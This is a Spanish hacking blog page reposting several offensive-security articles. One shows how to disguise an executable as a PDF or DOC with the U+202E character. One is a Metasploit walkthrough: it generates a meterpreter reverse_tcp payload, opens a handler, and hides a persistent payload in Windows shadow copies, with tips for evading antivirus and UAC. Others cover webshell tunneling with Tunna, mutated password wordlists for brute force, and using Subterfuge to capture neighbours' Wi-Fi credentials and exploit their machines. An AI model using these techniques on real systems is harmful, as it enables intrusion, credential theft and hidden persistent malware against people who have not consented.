Banner 1

El truco del carácter U+202E

0 comentarios
Janicab.A, como se conoce al troyano, utiliza un viejo truco para engañar al usuario: el carácter especial Unicode U+202E conocido como una anulación de derecha a izquierda para hacer que el archivo malicioso aparezca como un documento PDF en lugar de un archivo ejecutable potencialmente peligroso.

Nada más fácil de realizarse. Por ejemplo, imagina que nuestro server es cmd.exe:

1. Abrimos el mapa de caracteres de Windows (inicio, ejecutar, charmap)


2. Buscamos y copiamos el carácter Unicode U+202E. Fijaros que en la parte inferior izquierda se muestra el valor ASCII de los caracteres.




3. Pegamos (Ctrl+V) el carácter justo antes del punto de la extensión: cmd[[Unicode U+202E]].exe


4. Escribimos la extensión que queremos pero al revés, por ejemplo, si queremos "doc" escribiremos "cod" o si queremos "pdf" escribiremos "fdp".

Y al final el resultado visual será cmdexe.doc:




Por último para "endulzar" el vector de infección simplemente tendríamos que cambiar el icono con reshack u otro y utilizar un nombre algo más disimulado teniendo en cuenta que el "exe" o la extensión original debe permanecer. Por ejemplo:




Fuente:http://www.hackplayers.com/2013/07/janicaba-y-el-truco-del-caracter-u202e.html

Afina tus habilidades de penetración web con Mutillidae

0 comentarios

mutillidae.PNG

Multillidae es otro de los proyectos con los que podemos jugar y afinar nuestras técnicas de penetración web. Es un proyecto multiplataforma escrito en PHP y que se puede instalar usando XAMPP. También está disponible en la distribución Samurai WTF
Este proyecto cubre todas las vulnerabilidades recogidas en el OWASP Top 10.
Puedes descargar el proyecto desde aquí.
Como extra, en youtube puedes encontrar un canal (@webpwnized) (desarrollador actual del proyecto) con gran cantidad de vídeo tutoriales sobre esta plataforma. También puedes acceder a dichos vídeos desde la web de irongeek (creador inicial de Mutillidae).
La lista de los vídeos es la siguiente:

Puedes encontrar más información en la web del proyecto.

Fuente: http://www.cyberhades.com/2012/03/16/afina-tus-habilidades-de-penetracion-web-con-mutillidae/

JonDo: distribución GNU/Linux especializada en el anonimato en la red

0 comentarios
jondo_livecd
Otra distro para los fans de la discreción y la seguridad en internet, que nos proporciona un entorno live USB o DVD/CD, basado en Debian y entorno XFCE, configurado para ofrecernos navegación, correo electrónico y chat de forma totalmente anónima.
Más de lo mismo váis a pensar….pues no! Porque nada más lanzar el JonDo Browser (que es un Firefox 17 tuneado con extensiones como NoScript, Cookie Monster, HTTPS Everywhere…), vamos a observar algo que nos llamará la atención, y es que nos da tres maneras diferentes de conectarnos: sin proxy, con la red TOR o bien, utizando el sistema de proxys, que proporciona JonDO Anon Proxy (JAP).
jondo_image1_navegador
Este JAP, está formado por una red de servidores proxy de socios certificados, que se comprometen legalmente (por lo que he visto, la mayoría de esos servidores están en Europa) a no almacenar ningún tipo de información, sobre el tráfico que reciban.
jap
Ese tráfico de datos se cifra varias veces, en concreto cada vez que atraviesa un nodo a lo largo de su ruta (cascada le llaman en JonDo), y hay que decir que pese a ello, la velocidad no se resiente demasiado a la hora de navegar (existe una opción premium, que entre otras cosas, mejora el rendimiento).
jap2
Aparte del navegador, contamos con otros servicios preconfigurados, para funcionar de la misma manera, como el ciente de mensajería Pidgin o icedovel como gestor de correo electrónico.
icedove1
El menú es el clásico de XFCE, pero se le han sumado unas cuantas herramientas interesantes como: Jitsi, KeepassX, TrueCrypt, MAT (herramienta para borrar metadatos) o este ZuluCrypt (GUI de cryptsetup) que no tenía el placer de conocer.
zulu_image

JonDo Live CD está disponible para su descarga desde esta página, donde también podréis encontrar, alguna de sus herramientas por separado.

Fuente:http://lamiradadelreplicante.com/2013/09/30/jondo-distribucion-gnulinux-especializada-en-el-anonimato-en-la-red/

Crea un tunel TCP a través de HTTP mediante Tunna

0 comentarios
Tunna es un conjunto de herramientas de Nikos Vassakis para "envolver" y tunelizar cualquier comunicación TCP a través de HTTP. Es decir, puede ser utilizada para eludir las restricciones en redes protegidas por firewalls.

Básicamente consiste en una aplicación local (en Ruby o Python) y una aplicación web (ASP.NET, Java o PHP):




En entornos corporativos en los que se permite la navegación HTTP hacia Internet, un usuario podría conectarse al webshell de un servidor remoto estableciendo un túnel y eludiendo las reglas del firewall, siempre y claro está  que no haya una pasarela con deep inspection que analice el tráfico que lo atraviesa.

Este framework puede funcionar como proxy para hacer la conexión al cliente más transparente y además puede integrarse con Metasploit. Se ha comprobado su funcionamiento bajo los siguientes entornos:

- script ASP.NET - probado en IIS 6+8 (windows server 2003/2012)
- script JSP - probado en Apache Tomcat (windows + linux)
- script PHP - probado en LAMP + XAMPP + IIS (windows + linux)

uso():

ruby proxy.rb -u -p -r [options]
o
python proxy.py -u
-p -r [options]

-u, --url URL url of the remote webshell
-l, --lport PORT local port of proxy
-r, --rport PORT remote port of service for the webshell to connect to
-q, --ping-interval NUM webshprx pinging thread interval (default = 0.5)
-a, --addr IP address for remote webshell to connect to (default = 127.0.0.1)
-b, --buffer BUFF HTTP request size (some webshels have limitations on the size)
-s, --start-ping start the pinging thread first - some services send data first (SSH)
-v, --verbose verbose output - for debugging purposes
-h, --help Display this screen

 

Ejemplo:

ruby proxy.rb -u http://10.0.0.33:81/tun/conn.aspx -l 4444 -r 3389 -v

En una red en la que sólo se permite la salida al puerto TCP/81, el comando anterior inicia un conexión entre el webshell y el servicio RDP (3389) remoto. De esta manera el cliente podrá conectar al servicio RDP del servidor atacando al puerto 4444 de localhost.

Ej. (linux): rdesktop localhost:4444 




Fuente: http://www.secforce.com/research/tunna.html
http://www.hackplayers.com/2013/09/tunel-tcp-traves-de-http-mediante-tunna.html

Volatility Framework: Obteniendo hashes de un volcado de RAM

0 comentarios
Hoy vamos a ver como recuperar tanto los LSA Secrets de un volcado de RAM, como un volcado de hashes, que se encuentren en la SAM. Lo más interesante, es que podremos entender como realizar dichas acciones consiguiendo las direcciones donde el plugin correspondiente de Volatility debe buscarlo. En otras palabras, hay que entender porque realizamos dichas acciones, ya que nos dan pie a muchas otras.
PoC: Recuperando hashes de un volcado y los LSA Secrets
Para descubrir la direcciones de memoria donde se encuentra la SAM, Security, etcétera, se utilizará el plugin hivelist. La sintaxis es sencilla vol -f hivelist.


Lo interesante de la ejecución anterior es la dirección virtual obtenida. Con ella podremos utilizar otros plugins para obtener otro tipo de información, por ejemplo en el caso de las LSA Secrets existe un plugin denominado lsadump con el que podremos obtener el contenido de dicho contenedor. Para ello, el plugin nos pide la dirección virtual de System y Security. La sintaxis es sencilla, vol -f -y -s SECURITY>.



Por último vamos a estudiar el plugin hashdump de Volatility Framework. Con este plugin podemos obtener un volcado de usuarios y hashes de la SAM de Windows. Para llevar a cabo dicha acción la sintaxis es la siguiente vol -f -y -s .



Interesante herramienta y plugins Volatility Framework, próximamente más artículos sobre esta herramienta forense que hace que el análisis de RAM sea mucho más llevadero.

Fuente:http://www.flu-project.com/volatility-framework-obteniendo-hashes-de-un-volcado-de-ram.html

Ocultar payloads persistentes en volúmenes 'shadow copy' de Windows

0 comentarios

En Windows el servicio Volume Shadow Copy (VSS) crea copias de seguridad (snapshots) cada vez que hay un cambio en el sistema para poder tener disponible y actualizado un punto de restauración. Esta información de backup se almacena en volúmenes "ocultos" cuyas peculiaridades pueden ser aprovechadas con fines maliciosos, como por ejemplo ocultar artefactos de malware...

Recientemente se ha desarrollado un módulo de Metasploit para crear un payload persistente en un VSS en Windows 7. Se basa en el script VSSOwn de Tim Tomes y Mark Baggett y lo que hace es subir un ejecutable, crear un backup (VSS), borrarlo y ejecutar  \?\GLOBALROOT\/HarddiskVolumeShadowCopy\d{1,3}/%TEMP%\executable
La persistencia se consigue mediante una tarea programada (SCHTASK) o en una clave AUTORUN.

De momento para utilizarlo lo podemos descargar de Github:
root@kali:~# wget https://raw.github.com/MrXors/metasploit-framework/f345414832fe0895e6ed89e70eb57f72a103aeaf/modules/exploits/windows/local/vss_persistence.rb
root@kali:~# mv vss_persistence.rb /usr/share/metasploit-framework/modules/post/windows/manage/

Para probar generaremos un payload de prueba:
root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.177.128 LPORT=80 X > payload_prueba.exe

A continuación ejecutaremos la consola de Metasploit y recargaremos los módulos:
root@kali:~/# msfconsole -L
msf > reload_all
[*] Reloading modules from all module paths...
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            http://metasploit.pro


Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- type 'go_pro' to launch it now.

       =[ metasploit v4.7.1-2013100901 [core:4.7 api:1.0]
+ -- --=[ 1207 exploits - 728 auxiliary - 202 post
+ -- --=[ 314 payloads - 30 encoders - 8 nops

Lo siguiente será obtener una sesión meterpreter. Hay que tener en cuenta que nuestro nuevo módulo es de post-explotación y que necesitamos que el usuario de la sesión tenga privilegios administrativos. En caso contrario tendremos que hacer uso de otro módulo para la escalación de privilegios local.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > set LHOST 192.168.177.128
LHOST => 192.168.177.128
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.177.128:80 
[*] Starting the payload handler...

[*] Sending stage (770048 bytes) to 192.168.177.1
[*] Meterpreter session 1 opened (192.168.177.128:80 -> 192.168.177.1:4222) at 2013-10-16 06:07:56 -0100

meterpreter > getuid
Server username: PANDORA\vmotos
meterpreter > sysinfo
Computer        : PC102-23DRW
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : es_ES
Meterpreter     : x86/win32

Ahora dejaremos en background la sesión para finalmente ejecutar el exploit:
meterpreter > background 
[*] Backgrounding session 1...


msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  2   meterpreter x86/win32  PANDORA\vmotos @ PC102-23DRW  192.168.177.128:80 -> 192.168.177.1:5350 (192.168.177.1)
  
msf exploit(handler) > use post/windows/manage/vss_persistence 

msf exploit(vss_persistence) > show options

Module options (exploit/windows/manage/vss_persistence):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DELAY    1                yes       Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.
   EXECUTE  true             yes       Run the EXE on the remote system.
   RPATH                     no        Path on remote system to place Executable. Example: \\Windows\\Temp (DO NOT USE C:\ in your RPATH!)
   RUNKEY   false            yes       Create AutoRun Key for the EXE
   SCHTASK  false            yes       Create a Scheduled Task for the EXE.
   SESSION                   yes       The session to run this module on.
   VOLUME   C:\              yes       Volume to make a copy of.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7

msf exploit(vss_persistence) > set SCHTASK true
SCHTASK => true

msf exploit(vss_persistence) > set session 1
session => 1

msf exploit(vss_persistence) > exploit

[*] Started reverse handler on 192.168.177.128:4444 
[*] Checking requirements...
[*] Starting Volume Shadow Service...
[*] Volume Shadow Copy service not running. Starting it now...
[*] Volume Shadow Copy started successfully.
[*] Uploading payload...
[*] Creating Shadow Volume Copy...
[*] ShadowCopy created successfully
[*] Finding the Shadow Copy Volume...
[*] Deleting malware...
[*] Executing \Windows\Temp\svhost69.exe...
[*] Sending stage (770052 bytes) to 192.168.177.128
[*] Creating Scheduled Task...
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.134:4917) at 2013-10-16 06:15:32 -0100

Y ya lo tenemos.

pd. Si habéis seguido estos pasos ya os habréis dado cuenta: en el momento de su ejecución el motor de análisis en tiempo real del AV detectará el payload. Para evitarlo se podría montar el volumen oculto (VSC) como si fuera una unidad de red o seguir otras técnicas. Además necesitarás desactivar/evadir UAC...

Fuente:http://www.hackplayers.com/2013/10/ocultar-payloads-persistentes-en-vss.html

Bugtroid, un arsenal en tu dispositivo Android

0 comentarios

Bugtroid es una aplicación para sistemas operativos Android desarrollada por el equipo de  Bugtraq que reúne unas 200 aplicaciones relacionadas con temas de auditoria de seguridad, ya sea anonimato, auditoria web, de redes o temas forenses entre otras muchas categorías.

Como condición indispensable para exprimirla al máximo, es necesario ser root en el terminal. En cuanto a sus versiones, podemos acceder a ella de dos formas, una gratuita y otra de pago. La primera nos permite probar algunas aplicaciones y poco más, es principalmente una lista de todas las aplicaciones disponibles para hacernos una idea de la cantidad de herramientas que la componen. La potencia de la aplicación viene si compramos la versión PRO de ésta, por  apenas 1,85€ disponemos de todas las posibilidades.

Su funcionamiento es sencillo, se trata de una lista de aplicaciones organizadas por categorías, cuando seleccionamos una, ésta se instala en nuestro dispositivo. Esto nos ayuda a tener solo instaladas las aplicaciones que queramos y no "ensuciar" nuestro dispositivo de herramientas que no vayamos a utilizar o que no sean compatibles.
En este último punto aparece la principal queja que tengo de la aplicación, y es que no sabes si la aplicación que estas instalando es compatible con tu dispositivo. Entiendo que la solución no es sencilla ya que ni los mismos desarrolladores de las aplicaciones muchas veces saben todos los dispositivos compatibles con ellas, pero si se implementara o si apareciera una lista con los dispositivos probados seria interesante.

Sin contar el anterior detalle, la aplicación recoge un completísimo catálogo y nos permite descubrir muchas aplicaciones que de otra forma ignoraríamos.






En cuanto a la aplicación, el primer menú que nos encontramos cuando la abrimos nos permite escoger entre aplicaciones de Android o de GNU/Linux junto con un menú de opciones que nos permite instalar los interpretes de Python, perl y ruby además de ajustar algunos parámetros.
 


Como he comentado antes, en su menú encontramos todo tipo de aplicaciones clasificadas por categorías, estas aplicaciones son por ejemplo WifiKill o Intercepter-ng por comentar algunas tratadas en este blog (mas adelante analizaré más ;) ). Para su utilización basta con seleccionarla e instalarla, después veremos un acceso directo en el escritorio o en la versión PRO podemos ejecutarlas desde la misma Bugtroid.














Para descargar la versión gratuita:

https://play.google.com/store/apps/details?id=com.bugtroid.free.es
En cuanto a la versión de pago:

https://play.google.com/store/apps/details?id=com.bugtroid


En resumen, un completo catalogo de aplicaciones disponible para nuestros dispositivos que el equipo de Bugtraq se ha encargado de recoger para nosotros.

NOTA: Las mejores herramientas solo están disponibles en instalación PRO, así que si usamos la libre podremos usar prácticamente solo el modulo de anonimato.

Fuente: http://blog.0verl0ad.com/2013/10/bugtroid-un-arsenal-en-tu-dispositivo.html

Mutator: un generador de listas de contraseñas mutadas

0 comentarios
Frecuentemente muchas contraseñas de usuarios de empresa son nombres genéricos con cambios (sustituyendo las vocales por números) a las que se le añade un carácter y/o el año. Por ejemplo: corporation: C0rp0r4t10n_2012

Podéis imaginar que un ataque de fuerza bruta es muchísimo más efectivo si se eligen los nombres adecuados (nombres de compañía, departamentos, administradores de dominio, etc.) y se generan las mutaciones pertinentes.

Mutator de @AloneInTheShell es una herramienta escrita en C que nos ayudará a generar un diccionario acorde con mutaciones del tipo:

* Mutaciones de mayúsculas/minúsculas (toUpper, ToLower, FirstCharUpper, SwapCase)
* A mutación l33t
* Añadir carácter especial
* Anexar cadena de una lista predefinida
* Añadir fecha


Sintaxis: mutator [options] wordlist

Opciones:
    -v, --version          Muestra información de la versión
    -h, --help             Muestra esta ayuda
    -o, --output [file]    Fichero donde escribirá los resultados
    -f, --file [file]*     Fichero del cual leerá las palabras
    -w, --word [word]*     Palabra a mutar
    -b, --basic            Sólo mutaciones tipo "case" y "l33t"
    -a, --advanced         Sólo mutaciones avanzadas
    -y, --years=[year]     No añadir año, es posible especificar un rango de añios
    -x, --specials         No añadir caracteres especiales
    -s, --strings          No añadir cadenas prefijadas

    Al menos se requiere la opción -w o -f


Instalación:
 

* Desde el repositorio:

$ git clone https://bitbucket.org/alone/mutator
$ cd mutator
$ make

 
* Desde el tarball:

$ wget https://bitbucket.org/alone/mutator/downloads/mutator_release-vX.X.X.tar.gz
$ tar -xvzf mutator_release-vX.X.X.tar.gz
$ cd mutator
$ make


Ejemplos de uso:

$ ./mutator -w company -o company.dic


$ for i in $(cat user.dic);do ./mutator -w $i -o $i.dic; done

$ ./mutator -w prueba
[+] Number of words to mutate: 1
[+] Current word: 'prueba'
    [-] Basics mutations generated: 6
    [-] To leet mutations generated: 5
    [-] Special chars mutations generated: 108
    [-] Append strings mutations generated: 1053
    [-] Append year mutations generated: 1170
[+] Total mutations generated: 1170


Fuente: https://bitbucket.org/alone/mutator

http://www.hackplayers.com/2013/10/mutator-wordlist-generator.html

Recuperar las conversaciones del whatsapp

0 comentarios
Buenos días lectores.

El siguiente post es una recopilación de información para llevar a cabo la recuperación de las conversaciones de whatsapp, como es debido, próximamente subiré un laboratorio paso a paso de como hacerlo.

Biografía:

http://www.grupoandroid.com/topic/58343-recuperar-conversaciones-y-contactos-de-whatsapp/
http://gonzac-studios.blogspot.com.ar/2013/07/spyandroidftp-backup-diario-de-tus.html
gonzac-studios.blogspot.com/2012/03/hack-obtener-mensajes-de-whatsapp.html
http://blog.digital-forensics.it/2012/05/whatsapp-forensics.html
http://villatux.blogspot.com/2013/04/analisis-forence-whatsapp-cracking.html
http://www.securitybydefault.com/2011/06/lo-que-no-te-cuenta-whatsapp.html
http://www.securitybydefault.com/2012/05/descifrando-el-fichero-msgstoredbcrypt.html

Saludos roboticos.

Wardriving con Android

0 comentarios


Según Wikipedia:


Se llama wardriving a la búsqueda de redes inalámbricas Wi-Fi desde un vehículo en movimiento. Implica usar un coche o camioneta y un ordenador equipado con Wi-Fi, como un portátil o una PDA, para detectar las redes.


En este caso, yo les voy a enseñar a como realizar wardriving sin la necesidad de un coche y PC. Es decir, que por medio de un teléfono móvil con Android y caminar algunas cuadras, podremos tener el mismo resultado.
Lo que necesitaremos será instalar una aplicación llamada Wardrive, la cual pueden descargar desde la colección de aplicaciones de Underc0de
 
Una vez instalado, lo abrimos y veremos un mapa, el cual señala en donde estamos parados actualmente.
Lo que debemos hacer ahora, es comenzar a caminar por la calle, o si se prefiere en coche para alcanzar una cobertura aun mayor y la aplicación comenzara a dibujar la ruta que vamos haciendo con todas las redes inalámbricas que detecte. 


Si tocamos en la opción MAP MODE, la aplicación muestra al mapa con un poco más de detalle


Y si hacemos Zoom, podremos ver e identificar bien las casas que tienen Wifi.
Una vez que hayamos recorrido toda la zona, debemos exportar el mapa a KML (Keyhole Markup Language, lenguaje de marcas de Keyhole), KML es un formato de archivo que puede mostrar varios tipos de datos geográficos de nuevas formas. Para exportarlo, presionamos en el móvil el botón de menú y colocamos Exportar.
Y debemos seleccionar la opción KML para Google Earth


Una vez hecho esto, la aplicación guarda el archivo en la raíz del teléfono con el nombre wardrive.kml
Ahora solo debemos subir ese archivo a algún host, en mi caso lo he subido a 
Y lo colocamos en la url de Google Maps de la siguiente forma
 
Como se puede ver, la url llega hasta https://maps.google.com/maps?q= y le he añadido luego del igual la url en donde se encuentra el archivo KML. Esto nos dará como resultado el mapa con todas las redes inalámbricas capturadas.
También podemos hacer que filtre únicamente por las redes abiertas:


Otra de las cosas que se puede hacer, es seleccionar una sola red y ver bien de donde proviene:


En mi caso, esta red que he seleccionado, proviene de una escuela.



Post realizado por ANTRAX.

Fuente: http://blog.underc0de.org/2013/09/wardriving-con-android.html 

Espiando a nuestros Vecinos y Hackeandole el Sistema mediante Subterfuge

0 comentarios
 En la suite de BackTrack 5 r3 esta herramienta se integra por default y se puede utilizar con tan solo teclear subterfuge en la consola y luego abrir el localhost (127.0.0.1) desde nuestro navegador para apreciar la interfaz gráfica con todas las opciones para llevar a cabo nuestro ataque hacia las personas que estén conectadas en la misma red Wifi que nosotros.


PROCEDIMIENTOS:
Como mencione lineas arriba, solo tenemos que teclear subterfuge en la consola para poder abrir la interfaz gráfica desde el navegador.
OPCIONES
Subterfuge ofrece 8 módulos de ataque hacia las computadoras conectadas en nuestra red, su uso es muy fácil, solo tenemos que clickear 2 veces sobre alguna opción especifica.
Si deseamos obtener la información sobre usuarios y contraseñas de las webs en la que se conectan los usuarios de la red Wifi, solo tenemos que dar click donde dice START.
Seguidamente Subterfuge capturara todo lo que las victimas escriban dentro de su computador (algo como keylogger pero solo de usuarios y contraseñas) e aquí un ejemplo:
Después de haber obtenido información sobre los usuarios, también es posible penetrar su sistema  operativo mediante el exploit browser_autopwn que se integra en el modulo Network View, este modulo nos permitirá realizar un scan a toda la red en busca de las computadores conectadas a la red Wifi, algo parecido como Armitage y Nmap.
Luego de ejecutar el modulo Network View, Subterfuge empezara a scannear toda la red Wifi en busca de sistemas conectados, identificándolo de la siguiente manera:
Esto puede demorar varios minutos, dependiendo de los sistemas que estén conectados en la misma red, luego Subterfuge los  ira enumerando con información de la IP, MAC y el tipo de Sistema Operativo.
  
También se integra una opcion "Scan" que nos permitirá scanear el sistema para obtener información sobre los puertos open que tiene dicho sistema.
Al momento que clickeamos en "Expand" nos mostrara información sobre los puertos open, como también las opciones de ataque disponibles.
Al lado izquierdo se aprecia la opción para inyectar el modulo browser_autpwn que se integra en Metasploit, la cual nos permitirá obtener una session meterpreter en el sistema de la victima.
Con estos simples pasos, podemos obtener toda la información necesaria sobre el sistema de las personas que se conectan a nuestra red Wifi o en la red a la cual estemos conectados.

Espero les sirva y practiquen ;)

Fuente:http://calebbucker.blogspot.com/2012/12/espiando-nuestros-vecinos-y-hackeandole.html

[Arachni Framework] Escanear y Auditar Servidores Web

0 comentarios




En términos muy simples, Arachni es una herramienta que permite evaluar la seguridad de las aplicaciones web. En términos menos simples, Arachni es una herramienta modular Open Source de alto rendimiento.
Es un sistema que comenzó como un ejercicio educativo y como medio para realizar pruebas de seguridad específicas en contra de una aplicación web con el fin de identificar, clasificar y registrar los temas de interés de seguridad.
Ahora se ha convertido en una infraestructura fiable que puede realizar cualquier tipo de auditorias en aplicaciones web relacionada con la seguridad y el raspado de datos generales.


MÓDULOS:
- Path_traversal
- Os_cmd_injection_timing/os_cmd_injection

- Xss/xss_event/xss_uri/xss_tag/xss_path
- Code_injection/code_injection_timing
- Sqli_blid_rdiff /sqli_blind_timing


DESCARGA Y USO:
Arachni se encuentra disponible tanto para Linux, Windows y Mac OSX y la descarga se encuentra disponible desde su web oficial:
Después de haber descargado los respectivos archivos, tenemos que descomprimir y ejecutarlo en la consola desde su ubicación, ejemplo:
  • cd Desktop
  • cd arachni
  • cd bin
  • ls
  • ./arachni_web

Después de haber ejecutado el comando ./arachni_web esta creara una URL (0.0.0.0:4567) la cual se tendrá que abrir desde el navegador para apreciar la interfaz grafica de la herramienta con sus respectivas opciones de escaneo.

Seguidamente tenemos que abrir otra terminal y dirigirnos a la carpeta /arachni/bin/ para ejecutar el comando ./arachni_rpcd la cual nos permitirá habilitar y realizar el escaneo con la IP de nuestro localhost.
Ejecutado los 2 comandos mencionados lineas arriba, Arachni se podrá utilizar sin ningún inconveniente, mostrando las opciones de configuración, módulos  plugins y demás  como también la opción "Start a Scan" donde tenemos que colocar la URL a auditar.
Ingresado la URL a la cual auditaremos, clickeamos en "Launch Scan", esta nos redirigirá a otra interfaz donde se apreciara el trabajo que realiza la herramienta, mostrando el Crawling, Auditoria de Servicios, Puertos, Vulnerabilidades entre otros. El escaneo puede demorar dependiendo de los módulos que hemos habilitado para cada escaneo, como también la velocidad de nuestra conexión y memoria ram.
Al momento que la herramienta termina el trabajo de Escanear por completo el servidor especificado, esta nos mostrara la opción "Reports" donde tendremos opciones para apreciar los resultados en cualquier tipo de formato, las cuales son:
  • Marshal Report
  • YAML Report
  • XML Report 
  • HTML Report
  • Arachni Framework Report
  • Materport JSON 
  • Report Text report

Si queremos apreciar los resultados en una forma Gráfica, seleccionamos la opción HTML Report donde se mostrara las vulnerabilidades encontradas, la cual se aprecia de la siguiente manera:
A lado de Graps se encuentra la opción Issues, esta mostrara de una forma textual las vulnerabilidades encontradas en el servidor, especificando el nombre de la Vulnerabilidad y el Link Vulnerable.
Por ultimo tenemos una opción Trusted issues, la cual nos mostrara de una forma totalmente detallada del modulo que se ha usado, la variable afectada y la URL afectada (vulnerable), como también la descripción, una breve solución a esta vulnerabilidad y las referencias de UnixWiz, Wikipedia, SecuriTeam y OWASP con sus respectivos links de información.
Se puede decir que Arachni es algo parecido a Nessus, Retina y OpenVas, pero como toda buena herramienta siempre tiene algo diferente que los demás,  por eso es muy recomendable utilizar Arachni en nuestras Pruebas de Penetración para obtener resultados de una forma rápida y fácil.
Espero les sirva, un saludo ;)

Fuente: http://calebbucker.blogspot.com/2012/12/arachni-framework-una-forma-diferente.html
Powered by Bad Robot
Helped by Blackubay